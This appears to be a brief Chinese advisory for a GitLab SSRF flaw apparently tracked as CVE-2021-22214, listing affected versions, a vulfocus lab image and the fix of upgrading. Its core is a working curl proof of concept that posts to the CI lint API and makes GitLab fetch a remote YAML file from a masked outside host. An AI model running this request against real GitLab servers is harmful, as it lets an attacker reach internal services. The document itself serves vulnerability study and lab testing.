一、影响版本
13.10.5 > GitLab >= 10.5
13.11.5 > GitLab >= 13.11
13.12.2 > GitLab >= 13.12
二、漏洞POC
curl -s --show-error -H 'Content-Type: application/json' http://127.0.0.1:55001/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n remote: http://*****.******.cn/*****/?test.yml"}'
注意.yml是必要的
三、漏洞靶场
docker pull vulfocus/gitlab-cve_2021_22214:latest
四、修复方式
升级Gitlab